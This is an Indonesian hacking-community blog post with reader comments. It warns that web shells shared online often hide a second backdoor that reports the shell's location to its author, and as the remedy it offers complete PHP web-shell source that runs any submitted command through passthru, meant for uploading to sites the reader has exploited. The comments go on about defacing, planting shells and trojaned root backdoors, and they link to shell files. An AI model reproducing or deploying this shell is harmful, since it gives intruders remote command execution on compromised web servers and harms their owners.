Home > Uncategorized > Hati-hati terhadap Backdoor yang di-backdoor!

Hati-hati terhadap Backdoor yang di-backdoor!

Cuma ingin meneruskan lidah saja dari empunya IPSECS, “who owns who?”.
Hati-hati ya kawan-kawan bagi pecinta web-shell, php-shell atau jenis-jenis shell lainnya yang “tersebar” luas di internet. Karena tidak jarang didalam shell (baca: backdoor) tersebut ditanami backdoor lagi.

Mau bukti?

Coba deh teliti dulu setiap shell yang kita dapat dari internet. Apa bener disana gak ada backdoor’a lagi? Apa seh maksudnya?

Logikanya begini secara sistematis :
– Saya exploitasi web “A” dan memasang shell yang didapat dari web “B”.
– Lalu saya upload shell’a di dalam web “A”, dan muncullah link http://A.com/shell.php
– Dengan ketidaktahuan saya, ternyata kalau shell itu dipakai akan mengirimkan log ke sebuah email milik web “B” yang isinya url shell tadi.
– Ternyata si B tidak usah capek² mengupload shell, karena sudah diupload-kan oleh saya. hahahaha.
– Saya capek² mengupload’a, eh ujung²nya si “B” yang take-over semuanya. Nasiib.

Paham kan? Bagaimana solusinya? Ya coding sendiri lah! Ini ada source-code dari IPSECS

<html>
<pre>
- Backdoor Web Shell -
<form method="POST" action="<?php $_SERVER['PHP_SELF'] ?>" >
<table>
<tr>
 <td>Command : </td>
 <td>&nbsp;&nbsp;&nbsp; </td>
 <td><input type="text" name="command"></td>
</tr>
<tr>
 <td>&nbsp;&nbsp;&nbsp;</td>
 <td>&nbsp;&nbsp;&nbsp;</td>
 <td><input type="submit" value="execute!"></td>
</tr>
</table>
</form>
<?php
if(isset($_POST['command'])){
 echo "Executing "" . $_POST['command'] . ""<BR/>\n";
 if(!empty($_POST['command'])){
  passthru($_POST['command']);
 }else{
  echo "You cannot execute blank command!<BR/>\n";
 }
}
?>
</pre>
</html>
Categories: Uncategorized
  1. 12 May 2010 at 16:00

    Lha saya ga ngerti yg beginian =))

  2. AaEzha
    12 May 2010 at 16:09

    klo bingung, pegangan..awas jatoh..hehehe..

  3. 12 May 2010 at 16:42

    nyimak doeloe ya boz…hehehehe 🙂

  4. PanyOet
    12 May 2010 at 17:06

    wew…………. ane mah sering buat yang gini………… karena kan saya gk pande SQL, RFI LFI ii gitu lah 😛 maka-a buat nya gitu…. biar gk capek2….. 😛 thanks MAHO udah di bahas… xixiixixixiix

  5. 12 May 2010 at 18:12

    @anharku
    yups..monggo om..

    @mahok
    sombong :p

  6. gustiarsy
    13 May 2010 at 10:01

    hem, numpang baca dulu kk :Blush:

  7. Bobyputra
    13 May 2010 at 17:58

    hahahaha di aa ada2 aja nii…. gini2 aku jelaskan sedikit mengenai LOG email yg berada dlm shell
    di sini aku memberikan contoh shell c99 yg ada log nya…

    bisa di lihat di url sini
    http://www.idasy.com/c99.txt

    dor . search bagian

    $log_email

    di sana ada log mail yg kira2 source nya spt ini

    $curdir = “./”; //start folder
    //$curdir = getenv(“DOCUMENT_ROOT”);
    $tmpdir = “”; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
    $tmpdir_log = “./”; //Directory logs of long processes (e.g. brute, scan…)

    $log_email = “0xd4yx@gmail.com”; //Default e-mail for sending logs

    0xd4yx@gmail.com <— ini log mail nya ….
    nanti nya akan di kirimkan ke email itu apa bila kita menggunakan shell nya …

    nah kalo cara aa itu buat antisipasi bnr ga a…
    mungkin biar ga kena log 😀 or gmn. kurang tau juga aku ….
    maklum newbie a 😀

    • AaEzha
      13 May 2010 at 19:24

      @gusti
      silahkan atuh dibaca

      @bob
      kebanyakan kan pada di encrypt :p
      jadi klo untuk yang udah expert mah, pake php shell yang diatas aja 😀

  8. Bobyputra
    13 May 2010 at 21:49

    di decode dnk say …… http://Bobyhikaru.biz/shell 😀

  9. 13 May 2010 at 21:52

    @boby : asumsikan ente bicara ama orang yang dibawah ente pengetahuan’a 😛
    wkwkwkw..
    aa juga ngerti gitu mah say :hammer

  10. r0ll0v3r
    18 May 2010 at 11:58

    hmmm…begitu ya a’..hebat..hebat..ajarin donk 😀

    • AaEzha
      20 May 2010 at 10:44

      apalagi yang perlu saya ajarin? hehehe..

    • r0ll0v3r
      24 May 2010 at 17:38

      yahhh..all about heking..pengen jadi master kayak aa’ 😀

  11. AaEzha
    24 May 2010 at 19:15

    weh..master darimana??

    yang bilang saya master, itu bener2 :hoax gan!

    :sup: :sup:

  12. 28 May 2010 at 17:12

    Yup, malah beberapa shell terkenal ada yang kayak gituan… Jadi kira2 yan aman gimana Bro?

  13. AaEzha
    29 May 2010 at 16:27

    @Cruzen
    klo gitu, mendingan pake php-shell yang diatas aja bro 😀

    tapi pastikan curl-nya Open :bingung

  14. 6 June 2010 at 01:14

    saya istilah backdoor aja kurang paham…apalagi penggunaannya 😦

  15. 6 June 2010 at 01:26

    guitariznoize: saya istilah backdoor aja kurang paham…apalagi penggunaannya  

    nanti sama2 belajar aja kk 😀

  16. 6 June 2010 at 03:02

    wew, kalo kaya gitu mah nasib nasib, udah capek2 nanem shell malah orang yg seneng bukannya kita :ngakak

  17. 6 June 2010 at 04:36

    kahfiehudson: wew, kalo kaya gitu mah nasib nasib, udah capek2 nanem shell malah orang yg seneng bukannya kita   

    ya maka dari itu 😉

    jangan asal pake aja 😀
    hehehe..

  18. 6 June 2010 at 12:19

    hihihi 😀
    tp kalo misalkan udah ada shell tp kita upload lagi shellnya difolder laen misalnya bisa ga?

  19. 6 June 2010 at 13:42

    AaEzha:
    nanti sama2 belajar aja kk   

    klo backdoor wajib di pakai oleh para defacer” ya om ?

  20. 6 June 2010 at 19:46

    kahfiehudson: hihihi
    tp kalo misalkan udah ada shell tp kita upload lagi shellnya difolder laen misalnya bisa ga?  

    bisa aja, asalkan permission’a oke 😉

  21. 14 June 2010 at 14:21

    AaEzha:
    bisa aja, asalkan permission’a oke   

    oke sip tp ga ada gunanya upload shell lagi orang shellnya udah ada 😀

  22. faojand injector
    4 August 2010 at 17:04

    wakakak sama kayak shell ane ni………. 😛

  23. 4 August 2010 at 21:26

    @faojand injector
    iya kali gan..
    itu udah bertahun-tahun yang lalu tau’a 😀

  24. hehehehe
    21 October 2010 at 13:39

    itu dulu kerjaannya om dhegleng, jaman2nya backdoor ssh root
    dia nyebutnya ongkang2.tgz
    edit codingan backdoor orang, sebarkan, ongkang2 terima root
    😀

    http://www.dhegleng.or.id/qe3/?p=221

  25. AaEzha
    21 October 2010 at 16:00

    wakakkaa..
    emang bener” ongkang” ya..
    hehehe.. :hammers :hammers

  26. 17 December 2010 at 07:34

    Keep posting stuff like this i really like it

  27. 22 December 2010 at 09:20

    ÐŽHola!
    ЎGracias! Ahora me irй en este blog cada dнa!

    [url=http://elcorucom.servecounterstrike.com/]Edwas[/url]

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: